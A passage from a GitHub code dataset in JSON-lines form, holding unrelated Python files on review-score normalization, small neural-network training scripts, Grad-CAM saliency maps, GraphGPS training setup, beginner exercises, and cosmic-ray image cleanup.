element values are the standard\n deviations of the Weighted Scores across all of reviewers' reviews for this program.\n '''\n #Assume this will be applied using df.apply(calculate_z, axis=1, args = (reviewer_means, reviewers_stdDevs))\n \n name = row['Reviewer Full Name']\n if reviewer_stdDevs.loc[name] == 0:\n return 0\n else:\n return (row['Weighted Original Score'] - reviewer_means.loc[name]) / reviewer_stdDevs.loc[name]\n\ndef normalize_scores(df, score_range):\n '''\n Takes each reviewer's total weighted score for each project, transforms it into a\n z-score, then re-maps it on to a pre-defined normal distribution and returns a new DataFrame\n that is comprised of 5 columns: Reviewer Full Name, Control Number, Weighted Original Score, \n Weighted Score Z-Score, and Weighted Normalized Score\n \n df: pandas DataFrame. DataFrame of the format returned by import_data()\n reviewerStats: tuple of pandas Series of the format (reviewer means, reviewer standard deviations).\n score_range: tuple of ints of the format (min_score, max_score). Defines the end points of the allowed\n scoring range.\n '''\n \n '''REMEMBER: z-score correction shouldn't be applied to each criterion's score \n (which unfortunately was how I used it in the spreadsheet version of this, incorrectly) but rather\n just correct the original weighted score at a project (not criterion) level\n \n z-score = (original_data - mean) / stddev\n normalized_data = z-score * common_stddev + common_mean\n '''\n \n reviewerStats = reviewer_stats(df)\n \n #We'll define the standard deviation of our new common distribution using the definition of a normal\n #distribution as having 99.7% of its data within three standard deviations of the mean.\n \n stddev = (score_range[1] - score_range[0]) / 6\n \n #midpoint of the score range is defined as the mean of the distrib.\n mean = ((score_range[1] - score_range[0]) / 2) + score_range[0]\n \n \n reviewer_scores = df.groupby(['Reviewer Full Name', 'Control Number', 'Topic'])['Weighted Original Score'].sum()\n output_df = pd.DataFrame(reviewer_scores)\n output_df.reset_index(inplace = True)\n #output_df.columns = ['Reviewer Full Name', 'Control Number', 'Topic', 'Weighted Original Score']\n \n output_df['Weighted Score Z-Score'] = output_df.apply(calculate_z, \n axis=1, \n args = (reviewerStats[0],\n reviewerStats[1]))\n \n output_df['Weighted Normalized Score'] = (output_df['Weighted Score Z-Score'] * stddev) + mean\n \n #Let's make sure our new scores don't exceed the bounds of the scoring range\n output_df[output_df['Weighted Normalized Score'] < score_range[0]] = score_range[0]\n output_df[output_df['Weighted Normalized Score'] > score_range[1]] = score_range[1]\n \n return output_df\n \ndef tab_maker(df):\n '''\n Pulls out Topic names and returns a unique list of \n Topic + Number entries that can be used as Excel tab/sheet names. Also \n groups dataframe data by Topic name and returns a list of dataframes. Output\n is a tuple of the form (names, dataframes)\n \n df: pandas DataFrame. DataFrame of the format returned by normalize_scores()\n ''' \n \n #TODO: make this actually work. For now, going to just output to single tab\n \n tab_dfs = []\n \n topNum = df['Topic'].str.split(n=2, expand = True)[1]\n \n for e in topNum:\n temp_df = df.groupby(['Topic', 'Control Number'], \n as_index = False)['Weighted Original Score'].mean()\n \n \n tab_dfs.append(temp_df)\n \n return (\"Topic \" + topNum).unique()\n\ndef summarize_proposals(df):\n '''\n Groups proposals by topic, then by control number/ID, then calculates\n the average (original and normalized) score across reviewers for each\n proposal and returns a dataframe with those averages and standard deviations.\n \n df: pandas DataFrame. DataFrame of the format returned by normalize_scores()\n '''\n \n avg_orig = df.groupby(['Topic', 'Control Number'],\n as_index = False)['Weighted Original Score'].mean()\n \n avg_norm = df.groupby(['Topic', 'Control Number'],\n as_index = False)['Weighted Normalized Score'].mean()\n \n std_orig = df.groupby(['Topic', 'Control Number'])['Weighted Original Score'].std(ddof=0).reset_index()\n \n std_norm = df.groupby(['Topic', 'Control Number'])['Weighted Normalized Score'].std(ddof=0).reset_index()\n \n #Need to make sure the df we use to make our output df has proper column names\n avg_orig.columns = ['Topic', 'Control Number', 'Average Original Score']\n \n summary_df = avg_orig\n summary_df['Original Score StDev'] = std_orig['Weighted Original Score']\n summary_df['Average Normalized Score'] = avg_norm['Weighted Normalized Score']\n summary_df['Normalized Score StDev'] = std_norm['Weighted Normalized Score']\n \n return summary_df\n\ndef export_data(df, filename):\n '''\n Exports the results of normalization into a CSV file.\n \n df: pandas DataFrame. DataFrame of the format returned by normalize_scores()\n filename: str. Defines the relative path and filename of the CSV file you want to export to.\n '''\n \n if filename[-5:] != \".xlsx\":\n filename = filename[:-4] + \".xlsx\"\n \n \n writer = pd.ExcelWriter(filename)\n \n df.to_excel(writer, sheet_name = \"Full_Data\", \n freeze_panes = (1,1))\n summarize_proposals(df).to_excel(writer, \n sheet_name = \"Summary_Data\", \n freeze_panes = (1,1))\n \n #TODO: once you have tab_maker functioning...\n '''\n sheet_names = tab_name_maker(df)\n for name in sheet_names:\n df.to_excel(writer, sheet_name = name, freeze_panes = (1,1))\n \n '''\n \n writer.save()","repo_name":"emigre459/ReviewerNormalizing","sub_path":"Normalizer/ScoreNormalizer.py","file_name":"ScoreNormalizer.py","file_ext":"py","file_size_in_byte":10190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72638497129","text":"import torch\nimport pandas as pd\nimport datetime\nimport numpy as np\nfrom sklearn import preprocessing\n\ntemp_df = pd.read_csv('temps.csv')\nprint(temp_df.head())\n\nyears = temp_df['year']\nmonths = temp_df['month']\ndays = temp_df['day']\n\ndates = [str(year) + '-' + str(month) + '-' + str(day) for year, month, day in zip(years, months, days)]\n\ndates = [datetime.datetime.strptime(i, '%Y-%m-%d') for i in dates]\nprint(dates)\n\n# 把数据转化为可以构建成网络模型的数据(独热编码)\n# 这里是把字符串星期几 转化为 标签值\n#\nfeatures = pd.get_dummies(temp_df)\nprint(features.head(5))\n\nlabels = np.array(features['actual'])\nfeatures = features.drop('actual', axis=1)\n\n# 对数据进行标准化, sklearn.preprocessing 包提供了几个常用的实用函数和转换器类\n# fit_transform是fit和transform的组合,既包括了训练又包含了转换。\ninput_features = preprocessing.StandardScaler().fit_transform(features)\nprint(input_features[0])\n\n# 输入 和 实际值\nx = torch.tensor(input_features, dtype=float)\ny = torch.tensor(labels, dtype=float)\n\n#\nweights = torch.randn((14, 128), dtype=float, requires_grad=True)\nbiases = torch.randn(128, dtype=float, requires_grad=True)\n\n# 回归任务\nweights2 = torch.randn((128, 1), dtype=float, requires_grad=True)\nbiases2 = torch.randn(1, dtype=float, requires_grad=True)\n\nlearn_rate = 0.001\nlosses = []\n\nfor i in range(1000):\n\n # 计算隐层\n hidden = x.mm(weights) + biases\n # 激活函数,非线性变化\n hidden = torch.relu_(hidden)\n # 预测结果\n pre_data = hidden.mm(weights2) + biases2\n\n # 计算损失\n loss = torch.mean((pre_data - y) ** 2)\n losses.append(loss.data.numpy())\n\n if i % 100 == 0:\n print('loss: ', loss)\n\n # 反向传播 更新参数\n loss.backward()\n\n weights.data.add_(-learn_rate * weights.grad.data)\n biases.data.add_(-learn_rate * biases.grad.data)\n weights2.data.add_(-learn_rate * weights2.grad.data)\n biases2.data.add_(-learn_rate * biases2.grad.data)\n\n weights.grad.data.zero_()\n biases.grad.data.zero_()\n weights2.grad.data.zero_()\n biases2.grad.data.zero_()\n","repo_name":"yudongjian/learn_image_process","sub_path":"pytorch操作/手工的深度学习预测温度.py","file_name":"手工的深度学习预测温度.py","file_ext":"py","file_size_in_byte":2151,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"23467843728","text":"#짝수 홀수 구하기\n# def is_odd(a):\n# a =1\n# if a%2==0:\n# return(\"짝수입니다.\")\n# else:\n# return(\"홀수입니다.\")\n\n#평균 구하기\n\n# def avg_numbers(*args): # 입력 개수에 상관없이 사용하기 위해 *args를 사용\n# result = 0\n# for i in args:\n# result += i\n# return result / len(args)\n \n# avg_numbers(1,2)\n\ndef average(*args):\n result = 0\n for i in args :\n result += i\n return result / len(args)\n\nprint(average(1,3,5))\n\n\n\n","repo_name":"phaesol/Algorithm","sub_path":"2020.07.20.py","file_name":"2020.07.20.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3455610295","text":"import json\nfrom difflib import get_close_matches\n\ndata = json.load(open(\"data.json\"))\n\ndef translate(w):\n if w.lower() in data:\n return data[w]\n elif w.title() in data:\n return data[w.title()]\n elif w.upper() in data:\n return data[w.upper()]\n elif len(get_close_matches(w, data.keys())) > 0:\n yn = input(\"Did you mean %s instead? Y or N?\" % get_close_matches(w, data.keys())[0])\n if yn == \"Y\":\n return data[get_close_matches(w, data.keys())[0]]\n elif yn == \"N\":\n s = 1\n while yn == \"N\":\n if input(\"Did you mean %s instead? Y or N?\" % get_close_matches(w, data.keys())[s]) == \"Y\":\n return data[get_close_matches(w, data.keys())[s]]\n s +=1\n if s == 3:\n return \"We didn't understand your entry\"\n else:\n return \"This word doesn't exist\"\n\nword = input(\"Your word: \")\n\n\noutput = translate(word)\n\nif type(output) == list:\n s = 1\n for item in output:\n print(s, item)\n s +=1\nelse:\n print(output)\n\n","repo_name":"Cynic1404/10_projects","sub_path":"1 project - Dictionary/my_pr.py","file_name":"my_pr.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30861098952","text":"import datetime\nimport os\nimport torch\nimport logging\n\nimport graphgps # noqa, register custom modules\nfrom graphgps.agg_runs import agg_runs\nfrom graphgps.optimizer.extra_optimizers import ExtendedSchedulerConfig\n\nfrom torch_geometric.graphgym.cmd_args import parse_args\nfrom torch_geometric.graphgym.config import (cfg, dump_cfg,\n set_cfg, load_cfg,\n makedirs_rm_exist)\nfrom torch_geometric.graphgym.loader import create_loader\nfrom torch_geometric.graphgym.logger import set_printing\nfrom torch_geometric.graphgym.optim import create_optimizer, \\\n create_scheduler, OptimizerConfig\nfrom torch_geometric.graphgym.model_builder import create_model\nfrom torch_geometric.graphgym.train import GraphGymDataModule, train\nfrom torch_geometric.graphgym.utils.comp_budget import params_count\nfrom torch_geometric.graphgym.utils.device import auto_select_device\nfrom torch_geometric.graphgym.register import train_dict\nfrom torch_geometric import seed_everything\n\nfrom graphgps.finetuning import load_pretrained_model_cfg, \\\n init_model_from_pretrained\nfrom graphgps.logger import create_logger\n\n\ntorch.backends.cuda.matmul.allow_tf32 = True # Default False in PyTorch 1.12+\ntorch.backends.cudnn.allow_tf32 = True # Default True\n\n\ndef new_optimizer_config(cfg):\n return OptimizerConfig(optimizer=cfg.optim.optimizer,\n base_lr=cfg.optim.base_lr,\n weight_decay=cfg.optim.weight_decay,\n momentum=cfg.optim.momentum)\n\n\ndef new_scheduler_config(cfg):\n return ExtendedSchedulerConfig(\n scheduler=cfg.optim.scheduler,\n steps=cfg.optim.steps, lr_decay=cfg.optim.lr_decay,\n max_epoch=cfg.optim.max_epoch, reduce_factor=cfg.optim.reduce_factor,\n schedule_patience=cfg.optim.schedule_patience, min_lr=cfg.optim.min_lr,\n num_warmup_epochs=cfg.optim.num_warmup_epochs,\n train_mode=cfg.train.mode, eval_period=cfg.train.eval_period)\n\n\ndef custom_set_out_dir(cfg, cfg_fname, name_tag):\n \"\"\"Set custom main output directory path to cfg.\n Include the config filename and name_tag in the new :obj:`cfg.out_dir`.\n\n Args:\n cfg (CfgNode): Configuration node\n cfg_fname (string): Filename for the yaml format configuration file\n name_tag (string): Additional name tag to identify this execution of the\n configuration file, specified in :obj:`cfg.name_tag`\n \"\"\"\n run_name = os.path.splitext(os.path.basename(cfg_fname))[0]\n run_name += f\"-{name_tag}\" if name_tag else \"\"\n cfg.out_dir = os.path.join(cfg.out_dir, run_name)\n\n\ndef custom_set_run_dir(cfg, run_id):\n \"\"\"Custom output directory naming for each experiment run.\n\n Args:\n cfg (CfgNode): Configuration node\n run_id (int): Main for-loop iter id (the random seed or dataset split)\n \"\"\"\n cfg.run_dir = os.path.join(cfg.out_dir, str(run_id))\n # Make output directory\n if cfg.train.auto_resume:\n os.makedirs(cfg.run_dir, exist_ok=True)\n else:\n makedirs_rm_exist(cfg.run_dir)\n\n\ndef run_loop_settings():\n \"\"\"Create main loop execution settings based on the current cfg.\n\n Configures the main execution loop to run in one of two modes:\n 1. 'multi-seed' - Reproduces default behaviour of GraphGym when\n args.repeats controls how many times the experiment run is repeated.\n Each iteration is executed with a random seed set to an increment from\n the previous one, starting at initial cfg.seed.\n 2. 'multi-split' - Executes the experiment run over multiple dataset splits,\n these can be multiple CV splits or multiple standard splits. The random\n seed is reset to the initial cfg.seed value for each run iteration.\n\n Returns:\n List of run IDs for each loop iteration\n List of rng seeds to loop over\n List of dataset split indices to loop over\n \"\"\"\n if len(cfg.run_multiple_splits) == 0:\n # 'multi-seed' run mode\n num_iterations = args.repeat\n seeds = [cfg.seed + x for x in range(num_iterations)]\n split_indices = [cfg.dataset.split_index] * num_iterations\n run_ids = seeds\n else:\n # 'multi-split' run mode\n if args.repeat != 1:\n raise NotImplementedError(\"Running multiple repeats of multiple \"\n \"splits in one run is not supported.\")\n num_iterations = len(cfg.run_multiple_splits)\n seeds = [cfg.seed] * num_iterations\n split_indices = cfg.run_multiple_splits\n run_ids = split_indices\n return run_ids, seeds, split_indices\n\n\nif __name__ == '__main__':\n # Load cmd line args\n args = parse_args()\n # Load config file\n set_cfg(cfg)\n load_cfg(cfg, args)\n custom_set_out_dir(cfg, args.cfg_file, cfg.name_tag)\n dump_cfg(cfg)\n # Set Pytorch environment\n torch.set_num_threads(cfg.num_threads)\n # Repeat for multiple experiment runs\n for run_id, seed, split_index in zip(*run_loop_settings()):\n # Set configurations for each run\n custom_set_run_dir(cfg, run_id)\n set_printing()\n cfg.dataset.split_index = split_index\n cfg.seed = seed\n cfg.run_id = run_id\n seed_everything(cfg.seed)\n auto_select_device()\n if cfg.pretrained.dir:\n cfg = load_pretrained_model_cfg(cfg)\n logging.info(f\"[*] Run ID {run_id}: seed={cfg.seed}, \"\n f\"split_index={cfg.dataset.split_index}\")\n logging.info(f\" Starting now: {datetime.datetime.now()}\")\n # Set machine learning pipeline\n loaders = create_loader()\n loggers = create_logger()\n model = create_model()\n if cfg.pretrained.dir:\n model = init_model_from_pretrained(\n model, cfg.pretrained.dir, cfg.pretrained.freeze_main,\n cfg.pretrained.reset_prediction_head, seed=cfg.seed\n )\n optimizer = create_optimizer(model.parameters(),\n new_optimizer_config(cfg))\n scheduler = create_scheduler(optimizer, new_scheduler_config(cfg))\n # Print model info\n logging.info(model)\n logging.info(cfg)\n cfg.params = params_count(model)\n logging.info('Num parameters: %s', cfg.params)\n # Start training\n if cfg.train.mode == 'standard':\n if cfg.wandb.use:\n logging.warning(\"[W] WandB logging is not supported with the \"\n \"default train.mode, set it to `custom`\")\n datamodule = GraphGymDataModule()\n train(model, datamodule, logger=True)\n else:\n train_dict[cfg.train.mode](loggers, loaders, model, optimizer,\n scheduler)\n # Aggregate results from different seeds\n try:\n agg_runs(cfg.out_dir, cfg.metric_best)\n except Exception as e:\n logging.info(f\"Failed when trying to aggregate multiple runs: {e}\")\n # When being launched in batch mode, mark a yaml as done\n if args.mark_done:\n os.rename(args.cfg_file, f'{args.cfg_file}_done')\n logging.info(f\"[*] All done: {datetime.datetime.now()}\")\n","repo_name":"rampasek/GraphGPS","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7245,"program_lang":"python","lang":"en","doc_type":"code","stars":495,"dataset":"github-code","pt":"53"} +{"seq_id":"9186948461","text":"import numpy as np\nimport pandas as pd \n\nclass Annealing():\n\n def make(self):\n T = 14700*2\n M = 2 \n R = 0.5\n t = np.arange(0,T)\n tau = np.clip(t%np.ceil(T/M)/(T/M),0,1)\n beta = [t/R if t<=R else 1 for t in tau]\n beta = np.array(beta)\n df = pd.DataFrame(beta, columns=[\"beta\"])\n df.to_csv(\"../data/annealing.csv\", index=False) \n print(\"*--Check data folder--*\")\n\n\nif __name__==\"__main__\":\n an = Annealing()\n an.make()\n\n","repo_name":"fxnnxc/data","sub_path":"make_data/type1/beta_annealing.py","file_name":"beta_annealing.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"21935886085","text":"from custom_layers import custom_word_embedding\nfrom custom_layers import Attention\nfrom utils import load_emb_weights\nimport torch\nfrom torch import nn\n\nclass classifier(nn.Module):\n\n #define all the layers used in model\n def __init__(self, embedding_dim, hidden_dim, output_dim, n_layers, embed_weights,\n bidirectional=False, glove=True, init=True, dropout=0):\n\n #Constructor\n super().__init__()\n self.bidirectional = bidirectional\n\n if glove:\n # Embedding layer using GloVe\n self.embedding = custom_word_embedding(embed_weights)\n else:\n # Embedding layer without GloVe\n self.embedding = nn.Embedding(embed_weights.shape[0], embed_weights.shape[1])\n\n # LSTM layer and initialization\n self.lstm = nn.LSTM(embedding_dim,\n hidden_dim,\n num_layers=n_layers,\n bidirectional=bidirectional,\n dropout=dropout,\n batch_first=True)\n if init:\n for name, param in self.lstm.named_parameters():\n if 'bias' in name:\n nn.init.constant_(param, 0.0)\n elif 'weight' in name:\n nn.init.xavier_normal_(param)\n\n # Dense layer with initialization\n if self.bidirectional:\n self.fc = nn.Linear(hidden_dim * 2, output_dim)\n else:\n self.fc = nn.Linear(hidden_dim * 1, output_dim)\n if init:\n nn.init.xavier_normal_(self.fc.weight)\n #activation function\n #self.act = nn.Sigmoid()\n self.act = nn.Softmax(dim = 1)\n\n def forward(self, text, text_lengths=None):\n #text = [batch size,sent_length]\n text = text.view(text.size()[1], -1) # Remove the useless 1st axis\n embedded = self.embedding(text.long())\n #embedded = [batch size, sent_len, emb dim]\n embedded = embedded.float().cuda()\n #packed sequence\n #packed_embedded = nn.utils.rnn.pack_padded_sequence(embedded, text_lengths,batch_first=True)\n #si = embedded.size()\n #embedded = embedded.view(si[1],si[2],si[3])\n packed_output, (hidden, cell) = self.lstm(embedded)\n\n #hidden = [batch size, num layers * num directions,hid dim]\n #cell = [batch size, num layers * num directions,hid dim]\n\n #concat the final forward and backward hidden state\n if self.bidirectional:\n hidden = torch.cat((hidden[-2,:,:], hidden[-1,:,:]), dim = 1)\n\n #hidden = [batch size, hid dim * num directions]\n dense_outputs=self.fc(hidden)\n\n #Final activation function\n outputs=self.act(dense_outputs)\n\n return outputs\n\n\n\nclass AT_LSTM(nn.Module):\n\n #define all the layers used in model\n def __init__(self, embedding_dim, aspect_embedding_dim, hidden_dim,\n output_dim, n_layers, embed_weights, at=True, ae=False, dropout=0):\n\n #Constructor\n super().__init__()\n # ATAE ?\n self.ae = ae\n self.at = at\n self.embedding_dim= embedding_dim\n # Embedding layer using GloVe or fasttext\n self.embedding = custom_word_embedding(embed_weights)\n\n # Embedding layer using Glove for aspects\n self.aspects_embedding = custom_word_embedding(embed_weights)\n\n # Embedding layer without GloVe\n # self.embedding = nn.Embedding(emb_mat.shape[0], emb_mat.shape[1])\n\n # LSTM layer and initialization\n if self.ae:\n self.lstm = nn.LSTM(embedding_dim*2,\n hidden_dim,\n num_layers=n_layers,\n bidirectional=False,\n dropout=dropout,\n batch_first=True)\n else:\n self.lstm = nn.LSTM(embedding_dim,\n hidden_dim,\n num_layers=n_layers,\n bidirectional=False,\n dropout=dropout,\n batch_first=True)\n\n for name, param in self.lstm.named_parameters():\n if 'bias' in name:\n nn.init.constant_(param, 0.0)\n elif 'weight' in name:\n nn.init.xavier_normal_(param)\n\n # Attention layer with initialization\n if self.at:\n self.attention = Attention(aspect_embedding_dim, hidden_dim)\n self.attention.xavier_init()\n\n # Final dense layer with initialization\n self.fc = nn.Linear(embedding_dim, output_dim)\n nn.init.xavier_normal_(self.fc.weight)\n\n #activation function\n #self.act = nn.Sigmoid()\n self.act = nn.Softmax(dim = 1)\n\n def forward(self, inp, text_lengths=None):\n\n text = inp[0].view(inp[0].size()[1], -1) # Remove the useless 1st axis\n #text = [batch_size, sent_length]\n categories = inp[1].view(inp[1].size()[1]).long() #categories = [batch_size]\n\n embedded = self.embedding(text.long())\n\n # ATAE\n if self.ae:\n embedded_input_aspect = self.aspects_embedding(categories)\n embedded_input_aspect = embedded_input_aspect.view(embedded_input_aspect.size()[0],1,self.embedding_dim)\n embedded_input_aspect = embedded_input_aspect.repeat(1,embedded.size()[1],1)\n embedded = torch.cat((embedded, embedded_input_aspect), -1)\n\n #packed sequence\n #packed_embedded = nn.utils.rnn.pack_padded_sequence(embedded, text_lengths,batch_first=True)\n #si = embedded.size()\n #embedded = embedded.view(si[1],si[2],si[3])\n embedded = embedded.float().cuda()\n\n packed_output, (hidden, cell) = self.lstm(embedded)\n #packed_output = [batch_size, sent_length, hid_dim]\n #hidden = [batch size, num layers * num directions,hid dim]\n #cell = [batch size, num layers * num directions,hid dim]\n embedded_aspects = self.aspects_embedding(categories)\n embedded_aspects = embedded_aspects.float().cuda()\n #embedded_aspects = [batch_size, aspect_embedding_dim]\n\n if self.at:\n final_hidden = self.attention(embedded, embedded_aspects, packed_output)\n else:\n final_hidden = hidden\n #hidden = [batch size, hid dim * num directions]\n dense_outputs=self.fc(final_hidden)\n\n #Final activation function\n outputs=self.act(dense_outputs)\n\n return outputs\n","repo_name":"Volkaa/DD2424_Project","sub_path":"code/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27678091889","text":"#Write a program that takes an integer input from the user and counts down from that number to 1 using while loop\n\nuser = int(input(\"Enter The Number : - \"))\n\nwhile(True):\n if user == 0 :\n break;\n else:\n print(f\"{user} seconds left\")\n user = user - 1","repo_name":"DevilShubhtaken/python","sub_path":"Loops/While_LOOP/countdown_timer.py","file_name":"countdown_timer.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6739282592","text":"#Exercise2\nword= \"banana\"\nprint(str(word.count('a'))) # count the occurances of 'a' in 'word'\n\n#Exercise 3\nprint(word[::-1]) # print word backwards\ndef is_palindrome(word1): # function to check if string is palindrome\n return word1==word1[::-1]\nprint(str(is_palindrome(\"able was I ere I saw elba\")))\nlong_word=\"Pneumonoultramicroscopicsilicovolcanoconiosis\"\nprint(long_word[0:25:3]) # print every thrid symbol of the given string starting from symbol 0 upto symbol 24\n\ndef any_lowercase5(s):\n for c in s:\n if not c.islower():\n return False\n return True\n\nprint(str(any_lowercase5(\"asdawdadwdqad\")))\n\n\ndef rotate_word(word,number):\n new_string=\"\"\n for letter in word:\n new_string=new_string+ chr(ord(letter)+number)\n return new_string\nprint(rotate_word(\"labas\",5))","repo_name":"balbazauras/think-python","sub_path":"Chapter8_strings/exercises.py","file_name":"exercises.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25140445489","text":"import torch\nimport torch.nn.functional as F\n\nfrom utils import find_alexnet_layer, find_vgg_layer, find_resnet_layer, find_densenet_layer, find_squeezenet_layer\n\n\nclass GradCAM(object):\n \n def __init__(self, model_dict, verbose=False):\n model_type = model_dict['type']\n layer_name = model_dict['layer_name']\n self.model_arch = model_dict['arch']\n\n self.gradients = dict()\n self.activations = dict()\n def backward_hook(module, grad_input, grad_output):\n self.gradients['value'] = grad_output[0]\n return None\n def forward_hook(module, input, output):\n self.activations['value'] = output\n return None\n\n if 'vgg' in model_type.lower():\n target_layer = find_vgg_layer(self.model_arch, layer_name)\n elif 'resnet' in model_type.lower():\n target_layer = find_resnet_layer(self.model_arch, layer_name)\n elif 'densenet' in model_type.lower():\n target_layer = find_densenet_layer(self.model_arch, layer_name)\n elif 'alexnet' in model_type.lower():\n target_layer = find_alexnet_layer(self.model_arch, layer_name)\n elif 'squeezenet' in model_type.lower():\n target_layer = find_squeezenet_layer(self.model_arch, layer_name)\n\n target_layer.register_forward_hook(forward_hook)\n target_layer.register_backward_hook(backward_hook)\n\n if verbose:\n try:\n input_size = model_dict['input_size']\n except KeyError:\n print(\"please specify size of input image in model_dict. e.g. {'input_size':(224, 224)}\")\n pass\n else:\n device = 'cuda' if next(self.model_arch.parameters()).is_cuda else 'cpu'\n self.model_arch(torch.zeros(1, 3, *(input_size), device=device))\n print('saliency_map size :', self.activations['value'].shape[2:])\n\n\n def forward(self, input, class_idx=None, retain_graph=False):\n \n b, c, h, w = input.size()\n\n logit = self.model_arch(input)\n if class_idx is None:\n score = logit[:, logit.max(1)[-1]].squeeze()\n else:\n score = logit[:, class_idx].squeeze()\n\n self.model_arch.zero_grad()\n score.backward(retain_graph=retain_graph)\n gradients = self.gradients['value']\n activations = self.activations['value']\n b, k, u, v = gradients.size()\n\n alpha = gradients.view(b, k, -1).mean(2)\n #alpha = F.relu(gradients.view(b, k, -1)).mean(2)\n weights = alpha.view(b, k, 1, 1)\n\n saliency_map = (weights*activations).sum(1, keepdim=True)\n saliency_map = F.relu(saliency_map)\n saliency_map = F.upsample(saliency_map, size=(h, w), mode='bilinear', align_corners=False)\n saliency_map_min, saliency_map_max = saliency_map.min(), saliency_map.max()\n saliency_map = (saliency_map - saliency_map_min).div(saliency_map_max - saliency_map_min).data\n\n return saliency_map, logit\n\n def __call__(self, input, class_idx=None, retain_graph=False):\n return self.forward(input, class_idx, retain_graph)\n\n\nclass GradCAMpp(GradCAM):\n \n def __init__(self, model_dict, verbose=False):\n super(GradCAMpp, self).__init__(model_dict, verbose)\n\n def forward(self, input, class_idx=None, retain_graph=False):\n \n b, c, h, w = input.size()\n\n logit = self.model_arch(input)\n if class_idx is None:\n score = logit[:, logit.max(1)[-1]].squeeze()\n else:\n score = logit[:, class_idx].squeeze() \n \n self.model_arch.zero_grad()\n score.backward(retain_graph=retain_graph)\n gradients = self.gradients['value'] # dS/dA\n activations = self.activations['value'] # A\n b, k, u, v = gradients.size()\n\n alpha_num = gradients.pow(2)\n alpha_denom = gradients.pow(2).mul(2) + \\\n activations.mul(gradients.pow(3)).view(b, k, u*v).sum(-1, keepdim=True).view(b, k, 1, 1)\n alpha_denom = torch.where(alpha_denom != 0.0, alpha_denom, torch.ones_like(alpha_denom))\n\n alpha = alpha_num.div(alpha_denom+1e-7)\n positive_gradients = F.relu(score.exp()*gradients) # ReLU(dY/dA) == ReLU(exp(S)*dS/dA))\n weights = (alpha*positive_gradients).view(b, k, u*v).sum(-1).view(b, k, 1, 1)\n\n saliency_map = (weights*activations).sum(1, keepdim=True)\n saliency_map = F.relu(saliency_map)\n saliency_map = F.upsample(saliency_map, size=(224, 224), mode='bilinear', align_corners=False)\n saliency_map_min, saliency_map_max = saliency_map.min(), saliency_map.max()\n saliency_map = (saliency_map-saliency_map_min).div(saliency_map_max-saliency_map_min).data\n\n return saliency_map, logit\n","repo_name":"RutwikPatel13/Cataract_Detection_with_XAI","sub_path":"gradcam.py","file_name":"gradcam.py","file_ext":"py","file_size_in_byte":4801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74354025126","text":"import cv2\nimport numpy as np\n# ----- step 1 -----\n# 將有宇宙射線的圖片轉為負片\n# ----- step 2 -----\n# 拉普拉斯邊緣檢測負片\n# ----- step 3 -----\n# 濾鏡處理拉普拉斯檢測的負片\n\n# TODO: 優化整個程式流程 變成只要執行一次就好 且過程不存圖(創新檔案)\n# 新想法是,每次跑完流程,就調低檢測宇宙射線的判斷閥值,再跑一次流程\n# 有機會可以去除乾淨\ndef SaveImg(image_name, img):\n cv2.imwrite(image_name, img)\n\n\ndef NegativeFilm(row, col):\n nagativeImg = np.zeros(shape=(row, col, 1), dtype=np.uint8)\n for r in range(row):\n for c in range(col):\n nagativeImg[r, c] = 255 - img[r, c]\n\n return nagativeImg\n\n\ndef MarkComsic(img, row, col):\n '''\n 想避免雜訊的話,目前想法是如果周遭有2或3個鄰居的色差小於一定值或周遭的值直接黑掉,就當宇宙射線。 \\n\n 如果下方的點也有一些特徵 或許可以在markedMap做不同的標記。\n '''\n center_value = img[row, col]\n same_color_point_count = 0\n diff_color_point_count = 0\n # 如果中心點是夠白的\n if center_value > 230:\n # 判定周遭有多少顏色類似的點, 且是否有落差極大的點\n for i in range(-1, 2):\n for j in range(-1, 2):\n # 正中間的點不計算\n if i == 0 and j == 0:\n continue\n if img[row+i, col+j] > center_value-5 or img[row+i, col+j] < center_value + 5:\n same_color_point_count += 1\n elif img[row+i, col+j] < center_value/2:\n diff_color_point_count += 1\n # 是宇宙射線\n if same_color_point_count > 2 or diff_color_point_count > 3:\n return 1\n # 不是宇宙射線\n return 0\n\n\ndef blurred(img, row, col):\n '''\n 把指定像素模糊化\n '''\n # kernel = np.array([[2, 2, 2],\n # [2, 0, 1],\n # [1, 1, 1]])\n kernel = np.array([[0, 2, 0],\n [2, 0, 2],\n [0, 2, 0]])\n value = np.array([[img[row-1, col-1], img[row-1, col], img[row-1, col+1]],\n [img[row, col-1], img[row, col], img[row, col+1]],\n [img[row+1, col-1], img[row+1, col], img[row+1, col+1]]])\n return np.sum(np.floor(kernel/np.sum(kernel) * value))\n\n\nSTEP = 1\n# 手動更改路徑\ninput_path = \"./data_set/img_with_cosmic/\"\noutput_path = \"./data_set/img_with_cosmic/\"\nfilename = \"sample.png\"\n\nif __name__ == '__main__':\n # input灰階圖片\n img = cv2.imread(input_path+filename, 0)\n # 得到圖片大小\n img_rows = img.shape[0]\n img_cols = img.shape[1]\n # 標記宇宙射線位置\n markedImgMap = np.zeros(shape=(img_rows, img_cols, 1), dtype=np.uint8)\n\n # step 1 存負片\n if STEP == 1:\n SaveImg(output_path+filename, NegativeFilm(img_rows, img_cols))\n\n # step 2 拉普拉斯邊緣檢測\n elif STEP == 2:\n la_img = cv2.Laplacian(img, cv2.CV_16S, ksize=3)\n la_img = cv2.convertScaleAbs(la_img)\n SaveImg(output_path+filename, la_img)\n\n # step 3 濾鏡處理拉普拉斯檢測的負片\n # 